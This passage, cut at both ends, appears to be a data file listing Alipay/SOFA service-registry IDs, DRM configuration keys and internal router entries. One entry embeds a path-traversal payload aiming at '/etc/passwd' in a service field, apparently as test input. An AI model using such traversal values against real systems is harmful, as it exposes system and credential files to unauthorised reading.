ANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.InvalidVoucherTemplateDrm.unfreezeTemplateIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.tool.InsIopTemplateEngineMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.mng.StrategyRecommendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.useSemaphoreRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetfluxdcsmirror@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.entity.QuotaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FISCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.role.core.UserResourceRoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.components.twa.facade.TwaAdapterFacade:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.msecuritycore.SecurityPolicyLibServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.54.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.reading.biz.game.impl.rpc.DadaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.inssearch.mng.ProductIntentionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.PhysicalMountDimTableQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_HAINAPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.productCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:bizfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.facade.api.QuoteToolSignalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.commandcenter.service.facade.api.AcpReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillOweInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.57.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.biz.dispatcher.service.TaskExecuteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.eod.EODQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.biz.ImmOutBizCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.benefit.UserBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepRightsBizFacade:1.0:antfarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.mkt.car.AutoMktCarInfoFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.contentv2.ContentTagRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:fininsightmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.clientcache.drm.ClientCacheGrayDRM.grayCompatibilitySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundWebsiteAccountUpgradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.UserPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpOrgInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointAccountFlowinDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.member.MemberActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.biz.service.openapi.processor.RateCommonOperateOpenApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.fee.FeeBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeService:1.0:zcbsalescenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.mybankstaticweb.facade.ChairProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:linepay@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.fundsche.api.AccountRemindPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.MerchantProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securitycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_INSMARKETINGPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-infosectask-backtrack-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudprovision:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:progov@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.user.LoanAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliDbControlFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.MarketChanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.common.service.facade.TallyOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.OperatorSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodcore.common.service.bizprodmodel.facade.BizProdModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.tangyuan.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.openaccount.CheckUnregisterServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.LabelManageBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileorderprod.service.api.mng.UserIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.AbossOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.namelist.WhiteListWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.147.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:reimbursementSummaryDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:privilegeCategoryApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.PcreditDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paygrowth.common.service.facade.task.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.biz.service.msgbroker.EventHandler:1.0:organizationRevisitHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.SuddenIncreaseExceptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.starWishRollYebOrderPayDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.messagefusion.facade.api.FatigueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-icardcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.zcache.tbase.cardbinMdmTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.common.config.api.EntityFundAbilityConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:lendweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.std.AbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.riskentity.RmcPortraitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.177.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbatch.comm.service.facade.callback.BatchFluxCallbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.prizepool.MerchantPrizePoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_W_DW-SCHEDULE-01#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbarcenter.common.service.facade.ar.ArQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.OutcallConversationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.channelspop.service.decision.opportunity.facade.OpportunityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthprod.facade.HealthReservationPipelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledataprod.service.facade.UserTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.rpc.facade.IotPayAppBindBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.explorerEt15_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.ExternalBillServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.187.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.air.sdk.impl.framework.meta.MetaInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.malgo.common.facade.OraConstraintSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifeprod.common.service.facade.api.activity.LifeActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.AssetCashingDealService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_T_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.modifyThread,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.onestopmng.OstsPurchaseOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:daoApp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.UserOriginResidenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.member.facade.MemberBenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.api.ConnectionApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.test.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILE-GLOBAL-SAAS-PLUGIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.DictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.facade.autotest.FundAutoTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.inner.InsPolicyOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbinteligentpromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.zcache.log.lendpofprod.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.184.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.controlDirection,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.operator.common.service.facade.OperatorCzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scsupport.common.service.facade.prophet.ShadowDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.zcbsalescenter.AssetRedeemOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.trustprodcloud.common.service.facade.trust.instcontract.service.InstContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antscheduler.facade.ITopologyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.125.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditmng_dynamicContentProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.facade.hechuan.MsgbrokerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.home.rest.QuerySessionRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbreservationprod.common.service.facade.resourceins.ResourceInsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.pay.WkPaymentService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.GCardDepositOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearchmng.service.MonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntFinPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.RestTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.capacity.ActivityInspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlcloud.common.service.facade.api.ScriptVerifyService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.prodmng.invest_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compmng.service.facade.hf.service.HfTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.vein.winbillboard.common.service.facade.defense.IBetaChangeSwitch:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mapi.facade.partner.PartnerFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LIGHTMDS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterRcdecisionOrganTypeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.PortfolioNetValueCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:hyp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.ComponentService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.core.RequireQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_batchRefundAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.membertask.MemberTaskConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.EntityCharacterRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.biz.delivery.rpc.ExternalAdvertReachRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.business.BusinessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.appeal.TransportAppealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.InterfacePackageApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.lisa.Ukey2DispatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.moneyfund.api.MftransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:ecmChaseMgmt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.user.UserInfoQueryService:1.0-not-exists@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.AssetIsolationAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductQueryFacade:1.0:PDCORE_ANTGW2CN_FOR_ZP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.spi.MessageInvokeService:1.0:disburseMessageInvokeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.links.LinksFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.management.McommentCommonManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.AppInstanceGroupVersionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.walle.service.facade.api.CaseTagInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","links@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmMdmDataItemSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zbdm.common.service.facade.blood.ZbdmBloodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.biz.manager.config.RulemnglibManagerResource.forceRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.mpscore.MpsModelServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.transfer.TransferDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.campIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.BumngCommodityShopOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.UserManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TradeCoreSwitchDecisionResource.frontBizWhiteList,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.190.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.152.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.DiscussionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.transferQrBusinessConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.alsc.api.ShopSyncTaobaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finriskmngcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.